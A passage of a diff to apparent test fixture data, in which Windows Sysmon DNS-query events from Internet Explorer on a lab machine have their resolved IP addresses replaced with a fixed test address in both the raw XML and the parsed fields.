03:34:02.469\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eservice.sp.advertising.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 service.sp.aolp-ds-prd.aws.oath.cloud;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" 
@@ -802,7 +802,7 @@ "time_created": "2019-07-18T03:34:03.029Z", "level": "information", "event_data": { - "QueryResults": "type: 5 service.sp.aolp-ds-prd.aws.oath.cloud;::ffff:54.88.96.255;::ffff:34.233.100.168;::ffff:54.209.58.223;", + "QueryResults": "type: 5 service.sp.aolp-ds-prd.aws.oath.cloud;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:02.469", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", 
@@ -866,7 +866,7 @@ { "@timestamp": "2021-05-05T15:30:51.694Z", "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029098400Z'/\u003e\u003cEventRecordID\u003e82\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.485\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esb.scorecardresearch.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 sb.scorecardresearch.com.edgekey.net;type: 5 e1879.e7.akamaiedge.net;::ffff:184.25.176.117;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029098400Z'/\u003e\u003cEventRecordID\u003e82\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.485\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esb.scorecardresearch.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 sb.scorecardresearch.com.edgekey.net;type: 5 e1879.e7.akamaiedge.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" @@ -893,7 +893,7 @@ "ProcessId": "2736", "QueryName": "sb.scorecardresearch.com", "QueryStatus": "0", - "QueryResults": "type: 5 sb.scorecardresearch.com.edgekey.net;type: 5 e1879.e7.akamaiedge.net;::ffff:184.25.176.117;", + "QueryResults": "type: 5 sb.scorecardresearch.com.edgekey.net;type: 5 e1879.e7.akamaiedge.net;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:02.485", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}" 
@@ -905,7 +905,7 @@ { "@timestamp": "2021-05-05T15:30:51.694Z", "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029112900Z'/\u003e\u003cEventRecordID\u003e83\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.500\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eotf.msn.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 iceotf-prod-fe-tm.trafficmanager.net;type: 5 iceotf-prod-fe-eastus.cloudapp.net;::ffff:40.114.54.223;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029112900Z'/\u003e\u003cEventRecordID\u003e83\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.500\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eotf.msn.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 iceotf-prod-fe-tm.trafficmanager.net;type: 5 iceotf-prod-fe-eastus.cloudapp.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" @@ -930,7 +930,7 @@ "version": 5, "time_created": "2019-07-18T03:34:03.029Z", "event_data": { - "QueryResults": "type: 5 iceotf-prod-fe-tm.trafficmanager.net;type: 5 iceotf-prod-fe-eastus.cloudapp.net;::ffff:40.114.54.223;", + "QueryResults": "type: 5 iceotf-prod-fe-tm.trafficmanager.net;type: 5 iceotf-prod-fe-eastus.cloudapp.net;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:02.500", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", 
@@ -1024,7 +1024,7 @@ { "@timestamp": "2021-05-05T15:30:51.695Z", "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029126300Z'/\u003e\u003cEventRecordID\u003e84\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.580\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eping.chartbeat.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:35.171.101.225;::ffff:34.196.57.87;::ffff:34.194.164.46;::ffff:34.233.181.142;::ffff:34.194.167.169;::ffff:34.193.242.172;::ffff:34.234.152.11;::ffff:34.206.12.124;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029126300Z'/\u003e\u003cEventRecordID\u003e84\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.580\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eping.chartbeat.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" 
@@ -1045,7 +1045,7 @@ "ProcessId": "2736", "QueryName": "ping.chartbeat.net", "QueryStatus": "0", - "QueryResults": "::ffff:35.171.101.225;::ffff:34.196.57.87;::ffff:34.194.164.46;::ffff:34.233.181.142;::ffff:34.194.167.169;::ffff:34.193.242.172;::ffff:34.234.152.11;::ffff:34.206.12.124;", + "QueryResults": "::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe" }, "process": { @@ -1079,7 +1079,7 @@ "identifier": "S-1-5-18" }, "event_data": { - "QueryResults": "::ffff:151.101.194.79;::ffff:151.101.2.79;::ffff:151.101.66.79;::ffff:151.101.130.79;", + "QueryResults": "::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:02.628", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", 
@@ -1093,7 +1093,7 @@ "provider_guid": "{5770385f-c22a-43e0-bf4c-06f5698ffbd9}" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029148500Z'/\u003e\u003cEventRecordID\u003e85\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.628\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eclarium.freetls.fastly.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:151.101.194.79;::ffff:151.101.2.79;::ffff:151.101.66.79;::ffff:151.101.130.79;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029148500Z'/\u003e\u003cEventRecordID\u003e85\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.628\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eclarium.freetls.fastly.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" 
@@ -1116,7 +1116,7 @@ "event_data": { "QueryName": "nym1-ib.adnxs.com", "QueryStatus": "0", - "QueryResults": "::ffff:68.67.178.252;::ffff:68.67.179.11;::ffff:68.67.179.228;::ffff:68.67.178.184;::ffff:204.13.192.141;::ffff:68.67.180.43;::ffff:68.67.179.23;::ffff:68.67.179.197;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;", + "QueryResults": "::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:02.633", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", 
@@ -1135,7 +1135,7 @@ "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029159100Z'/\u003e\u003cEventRecordID\u003e86\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.633\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003enym1-ib.adnxs.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:68.67.178.252;::ffff:68.67.179.11;::ffff:68.67.179.228;::ffff:68.67.178.184;::ffff:204.13.192.141;::ffff:68.67.180.43;::ffff:68.67.179.23;::ffff:68.67.179.197;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e" + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029159100Z'/\u003e\u003cEventRecordID\u003e86\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.633\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003enym1-ib.adnxs.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e" } }, { 
@@ -1144,7 +1144,7 @@ "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029240500Z'/\u003e\u003cEventRecordID\u003e87\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.716\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eeb2.3lift.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 us-east-eb2.3lift.com;type: 5 dualstack.engagement-bus-prod-713264365.us-east-1.elb.amazonaws.com;::ffff:34.196.86.129;::ffff:34.233.250.110;::ffff:18.209.244.108;::ffff:34.224.204.11;::ffff:34.237.44.255;::ffff:3.210.231.21;::ffff:54.172.198.255;::ffff:34.199.186.227;192.5.6.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e" + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029240500Z'/\u003e\u003cEventRecordID\u003e87\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.716\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eeb2.3lift.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 us-east-eb2.3lift.com;type: 5 dualstack.engagement-bus-prod-713264365.us-east-1.elb.amazonaws.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e" }, "winlog": { "computer_name": "vagrant-2016", 
@@ -1157,7 +1157,7 @@ "ProcessId": "2736", "QueryName": "eb2.3lift.com", "QueryStatus": "0", - "QueryResults": "type: 5 us-east-eb2.3lift.com;type: 5 dualstack.engagement-bus-prod-713264365.us-east-1.elb.amazonaws.com;::ffff:34.196.86.129;::ffff:34.233.250.110;::ffff:18.209.244.108;::ffff:34.224.204.11;::ffff:34.237.44.255;::ffff:3.210.231.21;::ffff:54.172.198.255;::ffff:34.199.186.227;192.5.6.30;", + "QueryResults": "type: 5 us-east-eb2.3lift.com;type: 5 dualstack.engagement-bus-prod-713264365.us-east-1.elb.amazonaws.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:02.716", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}" 
